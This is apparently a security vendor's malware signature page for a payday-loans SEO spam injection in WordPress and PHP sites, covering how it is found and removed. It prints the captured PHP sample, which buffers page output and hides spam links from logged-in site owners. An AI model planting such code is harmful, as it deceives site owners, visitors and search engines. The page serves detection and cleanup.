Malware Signatures

  1. Home
  2. Docs
  3. Malware Signatures
  4. php.spam-seo.payday_loans.001


TBlackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
One common spam that is injected in sites is the payday_loans. It can be found inside theme files, database tables, or core files. Can be found encoded or in plain text.


Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.


Inspect your site's files and database tables looking for payday_loans entries or similar strings. Remove any strange code you find. Also, you can sign up with us and let our team remove the malware for you.


<?php function callbackx($buffer) {$tx="";if (function_exists("is_user_logged_in"))if (!is_user_logged_in()) $tx=" <style>.feoo{position:absolute;clip:rect(432px,auto,auto,448px);}</style><div class=feoo>The best solution <a href=http:// URL REMOVED >payday loans</a></div>"; if (stristr($buffer,"</a>"))$buffer=str_ireplace("</a>","</a>".$tx,$buffer); else $buffer=$tx.$buffer; return $buffer; } function buffer_startx(){ob_start("callbackx");} function buffer_endx(){ob_end_flush();} add_action('wp_head', 'buffer_startx'); add_action('wp_footer', 'buffer_endx'); ?>